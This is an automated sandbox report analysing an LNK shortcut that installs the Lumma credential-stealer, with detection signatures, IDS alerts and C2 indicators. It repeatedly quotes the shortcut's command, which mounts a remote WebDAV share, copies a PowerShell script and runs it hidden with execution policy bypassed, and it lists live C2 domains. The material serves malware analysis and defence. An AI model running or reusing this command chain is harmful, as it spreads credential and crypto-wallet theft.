Edit tour

Windows Analysis Report
d2W4YpqsKg.lnk

Overview

General Information

Sample name:	d2W4YpqsKg.lnk renamed because original name is a hash value
Original sample name:	80eea127b8641313f5065b35a541dfff1a5dfd645a2e6e31b353ecd2d756cc46.lnk
Analysis ID:	1574820
MD5:	30e8e8bf3ef225d1609c013f7914d88f
SHA1:	a8a268d6980623d1eb7eb56e8a4788a2c5b855a3
SHA256:	80eea127b8641313f5065b35a541dfff1a5dfd645a2e6e31b353ecd2d756cc46
Tags:	immureprech-bizlnkuser-JAMESWT_MHT
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Suricata IDS alerts for network traffic

Windows shortcut file (LNK) starts blacklisted processes

Yara detected LummaC Stealer

AI detected suspicious sample

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Gathers information about network shares

LummaC encrypted strings found

Machine Learning detection for sample

Performs DNS queries to domains with low reputation

Powershell drops PE file

Query firmware table information (likely to detect VMs)

Suspicious powershell command line found

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Windows shortcut file (LNK) contains suspicious command line arguments

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Suspicious Copy From or To System Directory

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

cmd.exe (PID: 7968 cmdline: "C:\Windows\System32\cmd.exe" /c net use Z: \\todmeng.com@SSL\webdav\ && copy Z:\adv.ps1 C:\Users\user\Documents\adv.ps1 /y && start powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\Users\user\Documents\adv.ps1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 7366FBEFE66BA0F1F5304F7D6FEF09FE)

net.exe (PID: 8064 cmdline: net use Z: \\todmeng.com@SSL\webdav\ MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)

powershell.exe (PID: 6152 cmdline: powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\Users\user\Documents\adv.ps1 MD5: DFD66604CA0898E8E26DF7B1635B6326)

conhost.exe (PID: 6728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 7366FBEFE66BA0F1F5304F7D6FEF09FE)

putty.exe (PID: 2568 cmdline: "C:\Users\user\AppData\Local\Temp\putty.exe" MD5: FCE954E0B8ABEC15C129A54BA33ED2CD)

net.exe (PID: 6076 cmdline: "C:\Windows\system32\net.exe" use Z: /delete MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["deafeninggeh.biz", "wrathful-jammy.cyou", "diffuculttan.xyz", "effecterectz.xyz", "awake-weaves.cyou", "debonairnukk.xyz", "sordid-snaked.cyou", "immureprech.biz"], "Build id": "BbL7Kk--55"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x4c8a1:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x4fe37:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
Process Memory Space: putty.exe PID: 2568	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: putty.exe PID: 2568	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: putty.exe PID: 2568	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security

Sigma Signatures

System Summary

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\Users\user\Documents\adv.ps1, CommandLine: powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\Users\user\Documents\adv.ps1, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c net use Z: \\todmeng.com@SSL\webdav\ && copy Z:\adv.ps1 C:\Users\user\Documents\adv.ps1 /y && start powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\Users\user\Documents\adv.ps1, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7968, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\Users\user\Documents\adv.ps1, ProcessId: 6152, ProcessName: powershell.exe

Sigma detected: Suspicious Copy From or To System Directory

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c net use Z: \\todmeng.com@SSL\webdav\ && copy Z:\adv.ps1 C:\Users\user\Documents\adv.ps1 /y && start powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\Users\user\Documents\adv.ps1, CommandLine: "C:\Windows\System32\cmd.exe" /c net use Z: \\todmeng.com@SSL\webdav\ && copy Z:\adv.ps1 C:\Users\user\Documents\adv.ps1 /y && start powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\Users\user\Documents\adv.ps1, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 640, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c net use Z: \\todmeng.com@SSL\webdav\ && copy Z:\adv.ps1 C:\Users\user\Documents\adv.ps1 /y && start powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\Users\user\Documents\adv.ps1, ProcessId: 7968, ProcessName: cmd.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\Users\user\Documents\adv.ps1, CommandLine: powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\Users\user\Documents\adv.ps1, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c net use Z: \\todmeng.com@SSL\webdav\ && copy Z:\adv.ps1 C:\Users\user\Documents\adv.ps1 /y && start powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\Users\user\Documents\adv.ps1, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7968, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\Users\user\Documents\adv.ps1, ProcessId: 6152, ProcessName: powershell.exe

Sigma detected: System Network Connections Discovery Via Net.EXE

Source: Process started

Author: frack113: Data: Command: net use Z: \\todmeng.com@SSL\webdav\, CommandLine: net use Z: \\todmeng.com@SSL\webdav\, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c net use Z: \\todmeng.com@SSL\webdav\ && copy Z:\adv.ps1 C:\Users\user\Documents\adv.ps1 /y && start powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\Users\user\Documents\adv.ps1, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7968, ParentProcessName: cmd.exe, ProcessCommandLine: net use Z: \\todmeng.com@SSL\webdav\, ProcessId: 8064, ProcessName: net.exe

Sigma detected: Windows Share Mount Via Net.EXE

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: net use Z: \\todmeng.com@SSL\webdav\, CommandLine: net use Z: \\todmeng.com@SSL\webdav\, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c net use Z: \\todmeng.com@SSL\webdav\ && copy Z:\adv.ps1 C:\Users\user\Documents\adv.ps1 /y && start powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\Users\user\Documents\adv.ps1, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7968, ParentProcessName: cmd.exe, ProcessCommandLine: net use Z: \\todmeng.com@SSL\webdav\, ProcessId: 8064, ProcessName: net.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T16:43:04.424038+0100	2028371	3	Unknown Traffic	192.168.2.3	49715	185.147.125.51	443	TCP
2024-12-13T16:43:51.288847+0100	2028371	3	Unknown Traffic	192.168.2.3	49840	172.67.207.38	443	TCP
2024-12-13T16:43:53.280240+0100	2028371	3	Unknown Traffic	192.168.2.3	49846	172.67.207.38	443	TCP
2024-12-13T16:43:55.546005+0100	2028371	3	Unknown Traffic	192.168.2.3	49852	172.67.207.38	443	TCP
2024-12-13T16:43:58.553019+0100	2028371	3	Unknown Traffic	192.168.2.3	49859	172.67.207.38	443	TCP
2024-12-13T16:44:00.844722+0100	2028371	3	Unknown Traffic	192.168.2.3	49865	172.67.207.38	443	TCP
2024-12-13T16:44:03.434940+0100	2028371	3	Unknown Traffic	192.168.2.3	49871	172.67.207.38	443	TCP
2024-12-13T16:44:05.732299+0100	2028371	3	Unknown Traffic	192.168.2.3	49877	172.67.207.38	443	TCP
2024-12-13T16:44:09.737572+0100	2028371	3	Unknown Traffic	192.168.2.3	49888	172.67.207.38	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T16:43:52.014792+0100	2054653	1	A Network Trojan was detected	192.168.2.3	49840	172.67.207.38	443	TCP
2024-12-13T16:43:54.005523+0100	2054653	1	A Network Trojan was detected	192.168.2.3	49846	172.67.207.38	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T16:43:52.014792+0100	2049836	1	A Network Trojan was detected	192.168.2.3	49840	172.67.207.38	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T16:43:54.005523+0100	2049812	1	A Network Trojan was detected	192.168.2.3	49846	172.67.207.38	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T16:43:57.112561+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.3	49852	172.67.207.38	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://immureprech.biz/	Avira URL Cloud: Label: malware
Source: https://immureprech.biz/apilf	Avira URL Cloud: Label: malware
Source: https://immureprech.biz/ts	Avira URL Cloud: Label: malware
Source: https://immureprech.biz/p	Avira URL Cloud: Label: malware
Source: https://immureprech.biz/apiOiL6	Avira URL Cloud: Label: malware
Source: https://immureprech.biz/_	Avira URL Cloud: Label: malware
Source: https://immureprech.biz/api	Avira URL Cloud: Label: malware
Source: https://immureprech.biz/pio	Avira URL Cloud: Label: malware
Source: https://immureprech.biz/apiz_	Avira URL Cloud: Label: malware
Source: https://immureprech.biz:443/api	Avira URL Cloud: Label: malware
Source: https://immureprech.biz/pig	Avira URL Cloud: Label: malware
Source: https://immureprech.biz/apizq	Avira URL Cloud: Label: malware

Found malware configuration

Source: putty.exe.2568.13.memstrmin

Malware Configuration Extractor: LummaC {"C2 url": ["deafeninggeh.biz", "wrathful-jammy.cyou", "diffuculttan.xyz", "effecterectz.xyz", "awake-weaves.cyou", "debonairnukk.xyz", "sordid-snaked.cyou", "immureprech.biz"], "Build id": "BbL7Kk--55"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for sample

Source: d2W4YpqsKg.lnk

Joe Sandbox ML: detected

Source: unknown	HTTPS traffic detected: 185.147.125.51:443 -> 192.168.2.3:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.147.125.51:443 -> 192.168.2.3:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.147.125.51:443 -> 192.168.2.3:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.147.125.51:443 -> 192.168.2.3:49799 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.207.38:443 -> 192.168.2.3:49840 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.207.38:443 -> 192.168.2.3:49846 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.207.38:443 -> 192.168.2.3:49852 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.207.38:443 -> 192.168.2.3:49859 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.207.38:443 -> 192.168.2.3:49865 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.207.38:443 -> 192.168.2.3:49871 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.207.38:443 -> 192.168.2.3:49877 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\putty.exe

Code function: 13_2_00323B60 FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,

13_2_00323B60

Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then mov eax, dword ptr [edi+0Ch]	13_2_028742F5
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then mov ecx, eax	13_2_0289D2FA
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	13_2_0289C245
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then mov word ptr [eax], cx	13_2_0289B39B
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then mov ecx, eax	13_2_0289D2CE
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then mov word ptr [eax], cx	13_2_0287C3E1
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then mov esi, ecx	13_2_028973FF
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then mov byte ptr [esi], al	13_2_0289E328
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then mov ecx, eax	13_2_028AC325
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then mov ebx, ecx	13_2_028AC325
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then jmp edx	13_2_0289534B
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then mov ecx, eax	13_2_0289D345
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then jmp edx	13_2_02895355
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then mov byte ptr [esi], al	13_2_0289E08A
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-49FD78B6h]	13_2_028880AB
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then mov ebx, edx	13_2_028AF182
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-49FD78B6h]	13_2_028891D2
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h	13_2_028B01E5
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then jmp ecx	13_2_028AF135
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], 7A5C62DDh	13_2_0288A159
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	13_2_028A6175
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then movzx ecx, byte ptr [ebp+eax+480B5CD2h]	13_2_02887688
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then mov dword ptr [esp+00000400h], A4BAB4B2h	13_2_0289D69B
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then mov dword ptr [ebp-10h], CECFF0F1h	13_2_028875E4
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then movzx ecx, byte ptr [ebp+eax+480B5CD2h]	13_2_028875E4
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+74h]	13_2_0287B6B5
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then push esi	13_2_028976E8
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], B430E561h	13_2_0288C615
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+75C754F5h]	13_2_028AE7C5
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then mov byte ptr [esi], cl	13_2_0289D726
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax+00000098h]	13_2_0289E762
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then movzx esi, byte ptr [ecx]	13_2_0288E48B
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-000000A6h]	13_2_028954D4
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then movzx ecx, byte ptr [ebp+eax+480B5CD2h]	13_2_028874E9
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then movzx esi, byte ptr [edi+eax-37h]	13_2_028AE4F3
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then movsx esi, byte ptr [ebx]	13_2_028AF4F5
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+edx]	13_2_02891415
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+480B5CE4h]	13_2_02898465
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then mov word ptr [edi], ax	13_2_0288F585
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then call 028AD755h	13_2_028AD5DC
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then mov ecx, ebp	13_2_02879525
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	13_2_0289C555
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then movzx edx, byte ptr [esp+esi+03817958h]	13_2_02887A85
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then mov byte ptr [ecx], dl	13_2_0288BAB1
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then mov ecx, edi	13_2_0289DA19
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then mov ecx, edi	13_2_0289DA1E
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then movzx edx, byte ptr [ebp+ecx-5FDE71D3h]	13_2_028ADA50
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then mov word ptr [ecx], dx	13_2_02886B87
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then mov word ptr [eax], cx	13_2_02886B87
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+edx-12AD8F37h]	13_2_0287DB9B
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then mov word ptr [ebx], ax	13_2_028ADBF1
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+esi+02h]	13_2_0289A8C1
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then mov edx, ecx	13_2_028AF866
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then movzx edi, byte ptr [eax]	13_2_028A9989
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then mov ebx, eax	13_2_028779C5
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then mov ebp, eax	13_2_028779C5
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-64ED58F5h]	13_2_0287DEB7
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-64ED58F5h]	13_2_0287DEB7
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+0000027Ch]	13_2_0288BED9
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then mov word ptr [ebp+00h], cx	13_2_0289AE29
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx+000002B0h]	13_2_02887E47
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then mov eax, ebx	13_2_0287AFC5
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then mov byte ptr [edi], bl	13_2_0287AFC5
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-49FD77D4h]	13_2_02888FE1
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+esi+0Ch]	13_2_028A8F65
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+0Ch]	13_2_028A8F65
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ecx+480B5CE4h]	13_2_0289AD8F
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then mov esi, dword ptr [esp+3Ch]	13_2_0289AD8F
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 7C7A349Ah	13_2_028ADD23

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.3:49840 -> 172.67.207.38:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.3:49846 -> 172.67.207.38:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.3:49846 -> 172.67.207.38:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.3:49840 -> 172.67.207.38:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.3:49852 -> 172.67.207.38:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: deafeninggeh.biz
Source: Malware configuration extractor	URLs: wrathful-jammy.cyou
Source: Malware configuration extractor	URLs: diffuculttan.xyz
Source: Malware configuration extractor	URLs: effecterectz.xyz
Source: Malware configuration extractor	URLs: awake-weaves.cyou
Source: Malware configuration extractor	URLs: debonairnukk.xyz
Source: Malware configuration extractor	URLs: sordid-snaked.cyou
Source: Malware configuration extractor	URLs: immureprech.biz

Performs DNS queries to domains with low reputation

Source:

DNS query: debonairnukk.xyz

Source: Joe Sandbox View

IP Address: 172.67.207.38 172.67.207.38

Source: Joe Sandbox View	ASN Name: E-STYLEISP-ASRU E-STYLEISP-ASRU
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.3:49715 -> 185.147.125.51:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.3:49840 -> 172.67.207.38:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.3:49846 -> 172.67.207.38:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.3:49852 -> 172.67.207.38:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.3:49865 -> 172.67.207.38:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.3:49871 -> 172.67.207.38:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.3:49877 -> 172.67.207.38:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.3:49859 -> 172.67.207.38:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.3:49888 -> 172.67.207.38:443

Source: global traffic	HTTP traffic detected: GET /webdav/infrarecorder.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031Host: todmeng.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: immureprech.biz
